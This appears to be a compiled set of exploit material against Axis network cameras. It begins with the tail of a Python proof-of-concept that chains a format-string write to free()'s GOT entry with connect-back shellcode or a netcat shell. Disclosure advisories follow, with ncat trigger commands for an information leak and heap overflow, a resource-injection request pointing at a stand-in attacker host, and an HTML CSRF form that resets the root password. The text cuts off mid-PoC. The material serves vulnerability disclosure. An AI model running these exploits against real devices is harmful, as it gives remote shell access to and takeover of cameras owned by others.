prog='axis-ssid-PoC.py',
description=('[*]' + INFO + '\n'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
# Print out info from dictionary
if args.dict:
target = FMSdb(rhost,verbose).FMSkey(0)
print "[db] Number of FMS keys:",len(target)
# Print out detailed info from dictionary
if verbose:
print "[db] Target details of FMS Keys availible for manual xploiting"
print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] == 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]
print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
for tmp in range(0,len(target)):
Key = sorted(target.keys())[tmp]
temp = re.split('[-]',Key)[0:10]
if temp[1] != 'NCSH':
print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]
print "\n"
else:
print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
Key = ""
for tmp in range(0,len(target)):
Key += sorted(target.keys())[tmp]
Key += ', '
print '\n',Key,'\n'
sys.exit(0)
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.noexploit:
noexploit = args.noexploit
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
if args.lport:
lport = args.lport
if args.lhost:
lhost = args.lhost
# Check if LPORT is valid
if not Validate(verbose).Port(lport):
print "[!] Invalid LPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if LHOST is valid IP or FQDN, get IP back
lhost = Validate(verbose).Host(lhost)
if not lhost:
print "[!] Invalid LHOST"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if noexploit:
print "[i] Test mode selected, no exploiting..."
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
print "[i] Connect back IP:",lhost
print "[i] Connect back PORT:",lport
rhost = rhost + ':' + rport
#
# FMS key is required into this PoC
#
if not args.fms:
print "[!] FMS key is required!"
sys.exit(1)
else:
Key = args.fms
print "[i] Trying with FMS key:",Key
#
# Prepare exploiting
#
# Look up the FMS key in dictionary and return pointer for FMS details to use
target = FMSdb(rhost,verbose).FMSkey(Key)
if target[Key][6] == 'NCSH1':
NCSH1 = target[Key][6]
NCSH2 = ""
elif target[Key][6] == 'NCSH2':
NCSH2 = target[Key][6]
NCSH1 = ""
else:
NCSH1 = ""
NCSH2 = ""
if Key == 'ARM-NCSH-5.8x':
print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
sys.exit(0)
print "[i] Preparing shellcode:",str(target[Key][6])
# We don't use url encoded shellcode with Netcat shell
# This is for MIPS/CRISv32 and ARM shellcode
if not NCSH1 and not NCSH2:
FMSdata = target[Key][4] # This entry aligns the injected shellcode
# Building up the url encoded shellcode for sending to the target,
# and replacing LHOST / LPORT in shellcode to choosen values
# part of first 500 decoded bytes will be overwritten during stage #2, and since
# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
# Let it be 0x00, just for fun.
FMSdata += '%00' * target[Key][5]
# Connect back IP to url encoded
ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
ip_hex = ip_hex.split()
IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];
# Let's break apart the hex code of LPORT into two bytes
port_hex = hex(int(lport))[2:]
port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
port_hex = port_hex.split()
if (target[Key][6]) == 'MIPSel':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%ff"
PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
elif (target[Key][6]) == 'CRISv32':
# Connect back PORT
if len(port_hex) == 1:
PP1 = "%00"
PP0 = '%{:02x}'.format(int(port_hex[0],16))
elif len(port_hex) == 2:
# Little Endian
PP1 = '%{:02x}'.format(int(port_hex[0],16))
PP0 = '%{:02x}'.format(int(port_hex[1],16))
else:
print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
sys.exit(1)
# Replace LHOST / LPORT in URL encoded shellcode
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("IP1",IP1)
shell = shell.replace("IP2",IP2)
shell = shell.replace("IP3",IP3)
shell = shell.replace("IP4",IP4)
shell = shell.replace("PP0",PP0)
shell = shell.replace("PP1",PP1)
FMSdata += shell
#
# Calculate the FMS values to be used
#
# Get pre-defined values
ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS
# POP_SIZE = 8
POP_SIZE = 1
GOThex = target[Key][0]
BSShex = target[Key][1]
GOTint = int(GOThex)
# 'One-Write-Where-And-What'
if not NCSH1 and not NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)
BSSint = int(BSShex)
BSSint = (BSSint - GOTint - ALREADY_WRITTEN)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint
# 'Two-Write-Where-And-What' using "New Style"
elif NCSH2:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat
# Calculate SecondWhat value, so it always is 0x20300
SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
FirstWhat = FirstWhat - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
# 'Two-Write-Where-And-What' using "Old Style"
elif NCSH1:
POP1 = target[Key][2]
POP2 = target[Key][3]
POP3 = target[Key][4]
POP4 = target[Key][5]
POP2_SIZE = 2
# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
if BSShex > 0x10000:
MSB = 1
else:
MSB = 0
# We need to count higher than provided address for the jump
BaseAddr = 0x10000 + BSShex
# Calculate for creating the FMS code
ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
GOTint = (GOTint - ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
# Calculate FirstWhat value
FirstWhat = BaseAddr - (ALREADY_WRITTEN)
ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)
# Calculate SecondWhat value, so it always is 0x203[00] or [01]
SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB
shell = shellcode_db(rhost,verbose).sc(target[Key][6])
shell = shell.replace("LHOST",lhost)
shell = shell.replace("LPORT",lport)
GOTint = GOTint - len(shell)
# if verbose:
# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
else:
print "[!] NCSH missing, exiting"
sys.exit(1)
#
# Let's start the exploiting procedure
#
#
# Stage one
#
if NCSH1 or NCSH2:
# "New Style" needs to make the exploit in two stages
if NCSH2:
FMScode = do_FMS(rhost,verbose)
# Writing 'FirstWhere' and 'SecondWhere'
# 1st request
FMScode.AddADDR(GOTint) # Run up to free() GOT address
#
# 1st and 2nd "Write-Where"
FMScode.AddDirectParameterN(POP1) # Write 1st Where
FMScode.Add("XX") # Jump up two bytes for next address
FMScode.AddDirectParameterN(POP2) # Write 2nd Where
FMSdata = FMScode.FMSbuild()
else:
FMSdata = ""
print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
else:
print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
# Actually, any valid and public readable .shtml file will work...
# (One of the two below seems always to be usable)
#
# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
#
try:
target_url = "/httpDisabled.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/httpDisabled.shtml?&http_user="
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except urllib2.HTTPError as e:
if e.code == 404:
print "[<] Error",e.code,e.reason
target_url = "/view/viewer_index.shtml?user_agent="
if noexploit:
target_url2 = target_url
else:
target_url2 = "/view/viewer_index.shtml?&http_user="
print "[>] Using alternative target shtml"
if NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
except Exception as e:
if not NCSH2:
print "[!] Shellcode delivery failed:",str(e)
sys.exit(1)
#
# Stage two
#
#
# Building and sending the FMS code to the target
#
print "[i] Building the FMS code..."
FMScode = do_FMS(rhost,verbose)
# This is an 'One-Write-Where-And-What' for FMS
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x0 | @0x7e818dbc -> [POP1's]
# 0x0 | @0x7e818dc0 -> [free () GOT address]
# 0x7e818dd0 | @0x7e818dc4>>>>>+ "Write-Where" (%n)
# 0x76f41fb8 | @0x7e818dc8 | -> [POP2's]
# 0x76f3d70c | @0x7e818dcc | -> [BSS shell code address]
# 0x76f55ab8 | @0x7e818dd0<<<<<+ "Write-What" (%n)
# 0x1 | @0x7e818dd4
#
if not NCSH1 and not NCSH2:
FMScode.AddPOP(POP1) # 1st serie of 'Old Style' POP's
FMScode.AddADDR(GOTint) # GOT Address
FMScode.AddWRITEn(1) # 4 bytes Write-Where
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
FMScode.AddPOP(POP2) # 2nd serie of 'Old Style' POP's
FMScode.AddADDR(BSSint) # BSS shellcode address
FMScode.AddWRITEn(1) # 4 bytes Write-What
# FMScode.AddWRITElln(1) # Easier to locate while debugging as this will write double word (0x00000000004xxxxx)
# End of 'One-Write-Where-And-What'
# This is an 'Two-Write-Where-And-What' for FMS
#
# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
# We jump over all SSI tagging to end up directly where "xxx" will
# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
#
# The Trick here is to write lower target address, that we will jump to when calling free(),
# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
# address with two LSB writes.
#
elif NCSH2:
#
# Direct parameter access for FMS exploitation are really nice and easy to use.
# However, we need to exploit in two stages with two requests.
# (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
#
# 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
# 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
#
# With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
# we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
#
# Stack Example:
#
# Stack content | Stack address (ASLR)
#
# 0x7e818dd0 | @0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818dc8 |
# 0x76f3d70c | @0x7e818dcc |
# 0x76f55ab8 | @0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
# 0x1 | @0x7e818dd4
# [....]
# 0x1c154 | @0x7e818e10
# 0x7e818e20 | @0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
# 0x76f41fb8 | @0x7e818e18 |
# 0x76f3d70c | @0x7e818e1c |
# 0x76f55758 | @0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
# 0x1 | @0x7e818e24
#
FMScode.Add(shell)
#
# 1st and 2nd "Write-Where" already done in stage one
#
# 1st and 2nd "Write-What"
#
FMScode.AddADDR(GOTint + FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddDirectParameterN(POP3) # Write with 4 bytes (we want to zero out in MSB)
FMScode.AddADDR(SecondWhat + 3) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddDirectParameterHHN(POP4) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
elif NCSH1:
# Could use direct argument addressing here, but I like to keep "old style" as well,
# as it's another interesting concept.
#
# Two matching stack contents -> stack address in row w/o or max two POP's between,
# is needed to write two bytes higher (MSB).
#
#
# Stack Example:
#
# Stack Content | @Stack Address (ASLR)
#
# 0x9c | @7ef2fde8 -> [POP1's]
# [....]
# 0x1 | @7ef2fdec -> [GOTint address]
#------
# 0x7ef2fe84 | @7ef2fdf0 >>>>>+ Write 'FirstWhere' (%n) [LSB]
# -> 'XX' | two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
# 0x7ef2fe8c | @7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
# ------ | |
# [....] -> [POP3's] | |
# 0x7fb99dc | @7ef2fe7c | |
# 0x7ef2fe84 | @7ef2fe80 | | [Count up to 0x2XXXX]
# 0x7ef2ff6a | @7ef2fe84 <<<<<+ | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
# -> [POP4's] |
# (nil) | @7ef2fe88 | [Count up to 0x20300]
# 0x7ef2ff74 | @7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)
FMScode.Add(shell)
# Write FirstWhere for 'FirstWhat'
FMScode.AddPOP(POP1)
FMScode.AddADDR(GOTint) # Run up to free() GOT address
FMScode.AddWRITEn(1)
# Write SecondWhere for 'SecondWhat'
#
# This is special POP with 1 byte, we can maximum POP 2!
#
# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
# Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
#
if POP2 != 0:
# We only want to write 'SecondWhat' two bytes higher at free() GOT
if POP2 > 2:
print "POP2 can't be greater than two!"
sys.exit(1)
if POP2 == 1:
FMScode.Add("%2c")
else:
FMScode.Add("%1c%1c")
else:
FMScode.Add("XX")
FMScode.AddWRITEn(1)
# Write FirstWhat pointed by FirstWhere
FMScode.AddPOP(POP3) # Old Style POP's
FMScode.AddADDR(FirstWhat) # Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
FMScode.AddWRITEn(1) # Write with 4 bytes (we want to zero out in MSB)
# Write SecondWhat pointed by SecondWhere
FMScode.AddPOP(POP4) # Old Style POP's
FMScode.AddADDR(SecondWhat) # Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
FMScode.AddWRITEhhn(1) # Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation
else:
sys.exit(1)
FMSdata = FMScode.FMSbuild()
print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))
# FMS comes here, and calculations start after '=' in the url
try:
if NCSH1 or NCSH2:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
else:
html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
except urllib2.HTTPError as e:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
except Exception as e:
# 1st string returned by HTTP mode, 2nd by HTTPS mode
if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
print "[i] Timeout! Payload delivered sucessfully!"
else:
print "[!] Payload delivery failed:",str(e)
sys.exit(1)
if noexploit:
print "\n[*] Not exploiting, no shell...\n"
else:
print "\n[*] All done, enjoy the shell...\n"
#
# [EOF]
#
[STX]
Subject: Axis Communications MPQT/PACS Heap Overflow and Information Leakage.
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (August 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 1, 2017
Full Disclosure: 90 days (due to the large volume of affected devices)
heap: Non-Executable + ASLR
stack: Non-Executable + ASLR
Axis Vulnerability ID: ACV-120444
Vulnerable: MPQT series < v7.20.x/6.50.1.2
Not vulnerable: MPQT series > v7.30/6.50.1.3 (Releases from September to November 2017)
Vulnerable: PACS series < v1.30.0.2/1.60.0/1.10.0.2/1.65.1
Not vulnerable (Releases from October to November 2017):
1. Information leak; All MPQT and PACS (Exist actually from v4.x Firmware)
2. Heap Overflow; MPQT and PACS with Apache Web Server (cannot be triggered with Boa Web Server)
[Note]
The best way to find a fixed FW is to check the Axis advisory and look for 'ACV-120444' in the release notes.
https://www.axis.com/global/en/support/firmware
https://www.axis.com/global/en/support/product-security
Timeline:
August 31, 2017: Initiated contact with Axis
September 1, 2017: Response from Axis
September 5, 2017: ACK of findings from Axis
September 9, 2017: Received first test image from Axis to verify fix
September 28, 2017: Received first advisory draft from Axis
November 15-27, 2017: Coordination with Axis for Full Disclosure
December 1, 2017: Full Disclosure
-[General Information]-
"CGI_decode" in /usr/lib/libcgiparser.so suffers from a bug in the handling URL decode of '%xx'.
The CGI_decode does not check the size of what it is about to decode, it always assumes "%" plus two chars.
By supplying only one single '%', 'CGI_decode' will try to URL decode [% + NULL + Next char], which lead to the return of a longer string than expected as the new string will be read until the next NULL. ([NULL string termination + Next char] are replaced with one '?')
-[Information leakage]-
The "%"" in "GET /index.shtml?size=%"" triggers both "information disclosure" and "heap overflow", depending on how it will be used.
[PoC] (see the breakpoint with the 'AAAA' in the 'Result')
$ echo -en "GET /index.shtml?size=AAAA% HTTP/1.0\n\n" | ncat -v 192.168.57.20 80
[Result]
...
var completePath = "imagepath=" + encodeURIComponent(imagepath) + "&size=AAAA?http_user=anonymous&http_remote_addr=192.168.57.1&http_remote_port=44019&http_port=80&http_scheme_addr=http://http&http_protocol=http&www_authenticate_header=WWW-Authenticate:%20Digest%20realm=%22_%22,%20nonce=%22pP/WaqNeBQA=884e58ea2563f69a14215a33ca02efa68eeca126%22,%20algorithm=MD5,%20qop=%22auth%22";
...
-[Heap Overflow]-
To trigger the heap overflow we need to send ~20KB amount of data that would normally not be accepted by the Web server.
The way around this is to use 'Referer:' and 'x-sessioncookie', where we can send max 8162 bytes in each of them.
[Note]
Without the information leakage bug above, the realloc() will never be triggered regardless how much data is sent.
[PoC]
$ echo -en "GET /index.shtml?size=% HTTP/1.0\nReferer: `for((i=0;i<8162;i++));do echo -en "\x22";done`\nx-sessioncookie: `for((i=0;i<2157;i++));do echo -en "\x22";done`\n\n" | ncat -v 192.168.57.20 80
[Result]
/var/log/info.log
2017-05-08T08:22:23.801+00:00 axis [ INFO ] ssid[3337]: *** Error in `/bin/ssid': realloc(): invalid next size: 0x00bfda50 ***
-[Vulnerable binaries]-
/bin/ssid (Server Side Include Daemon)
/bin/urldecode (URL Command Line Tool)
/usr/bin/dynamic_overlayd (Dynamic Overlay Daemon)
/usr/bin/wsd (Web Service Dispatch Daemon)
/usr/html/axis-cgi/param.cgi (VAPIX Parameter Management)
/usr/lib/libwsevent.so
/usr/lib/libcgiparser.so (<= with the vulnerable function 'CGI_decode()', used in above binaries)
Have a nice day
/bashis
[ETX]
0RWELLL4BS
**********
security advisory
olsa-2015-8258
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: ImagePath Resource Injection/Open script editor
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Improper Input Validation [CWE-20]
- CVE Name: CVE-2015-8258
- Affected Versions: Firmwares versions <lt 5.80.x
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
rization
- OWASP IoTTop10: I1, I2
Technical Details
=================
The variable "imagePath=" (that is prone to XSS in a large range of
products) also can be used to resource injection intents. If inserted a URL
in this variable will be made an GET request to this URL, so this an
interesting point to request malicious codes from the attacker machine, and
of course, the possibilities are vast (including hook the browser).
An attacker sends the following URL for the current Web user interface of
the camera:
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
This request will be processed normally and will return the status code 200
(OK):
[REQUEST]
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
Host: {axisvulnhost}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
Connection: keep-alive
GET /evilcode.html HTTP/1.1
Host: www.3vilh0st.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
Firefox/41.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
st.com/evilcode.html
Connection: keep-alive
The server response can be seen below (with the clipping of the affected
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
<table border="0" cellpadding="3" cellspacing="3">
<tr>
<td id="videoStreamTable">
<script language="JavaScript">
<!--
video('http://www.3vilh0st.com/evilcode.html');
// -->
</script>
</td>
</tr>
</table>
[..SNIP..]
function listVideoSources()
{
var formInt = document.listFormInt;
var formExt = document.listFormExt;
var formCrop = document.listFormCrop;
var presetForm = document.listFormPreset;
var form = document.WizardForm
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
var imageSource;
[..SNIP..]
var reload = false;
reload |= (other != null && other.search("seq=yes") >= 0);
reload |= (other != null && other.search("streamprofile=") >= 0);
reload |= ((other == null || (other != null && other.search("streamprofile=
;)(r") == -1)) && ('' != ""));
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
[..SNIP..]
<script SRC="/incl/activeX.js?id=69"></script>
</head>
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
<script language="JavaScript">
[..SNIP..]
// Draw the scale buttons
var currentResolution = 0
var width = 0
var height = 0
var imagepath = "http://www.3vilh0st.com/evilcode.html"
var resStart = imagepath.indexOf("resolution=")
if (resStart != -1) {
var resStop = imagepath.indexOf("&", resStart)
[..SNIP..]
=================== view.shtml snips =====================
447 function zoom(size)
448 {
449 var url = document.URL;
450
451 if (url.indexOf("?") == -1) {
452 url += "F?size=" + size
453 } else if (url.indexOf("size=") == -1) {
454 url += "&size=" + size
455 } else {
456 var searchStr = "size=<!--#echo var="size"
option="encoding:javascript" -->"
457 var replaceStr = "size=" + size
458 var re = new RegExp(searchStr , "g")
459 url = url.replace(re, replaceStr)
460 }
461
462 document.location = url;
463 }
464
465 var aNewImagePath;
466
467 function reloadPage()
468 {
469 document.location = aNewImagePath;
470 }
471
[ SNIP ]
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
escape(imagePath) + size;
568 if (other != null)
569 aNewImagePath += other;
570 <!--#if expr="$ptzpresets = yes" -->
571 /* append preset parameters so that preset postion is selected in
drop down list after reload */
572 if (presetName != '')
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
574 else if (gotopresetname != '')
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
576
577 if( newCamera != '')
578 aNewImagePath += "&camera=" + escape(newCamera);
---*---
Some legitimate resources can be very interesting to cybercriminals with
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
there are some resources, like the "Open Script Editor". By this resource
the user can edit any file in the operation system with root privileges,
because everything (in the most part of IoT devices) runs with root
privileges, this is other dangerous point to keep in mind.
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
Well, one can say that this feature is restricted to the administrator of
the camera, and this would be true if customers were forced to change the
default password during setup phase with a strong password policy, since
change "pass" to "pass123" does not solve the problem. The aggravating
factor is that there are thousands of products available on the internet,
running with default credentials.
Vendor Information, Solutions and Workarounds
+++++++++++++++++++++++++++++++++++++++++++++
According to the manufacturer, the resource injection vulnerability was
fixed in firmware 5.60, but we identified that the problem still occurred
in 5.80.x versions of various product models. Check for updates on the
manufacturer's website.
About Open Script Editor,It was considered that in order to have access to
this feature, it is necessary to be authenticated as an admin, but if there
is no policy that forces the client to change the password during the
product setup (ease vs. security) and also requires a password complexity,
having an administrative credential to abuse the functionality is not
exactly an impediment (e.g: botnets that bring embedded in the code a
relation of default credentials for that type of device)
Credits
=======
These vulnerabilities has been discovered and published by Orwelllabs.
Legal Notices
=============
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
About Orwelllabs
================
https://www.exploit-db.com/author/?a=8225
https://packetstormsecurity.com/files/author/12322/
0RWELLL4BS
**********
security advisory
olsa-CVE-2015-8255
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1
Technical Details
=================
Because of the own (bad) design of this kind of device (Actualy a big
problem of IoT, one of them)
The embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.
PoCs
====
#-> Setting root password to W!nst0n
<html>
<!-- CSRF PoC Orwelllabs -->
<body>
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="pwd" value="w!nst0n" />
<input type="hidden" name="comment" value="Administrator" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#-> Adding new credential SmithW:W!nst0n
<html>
<!-- CSRF PoC - Orwelllabs -->
<body>
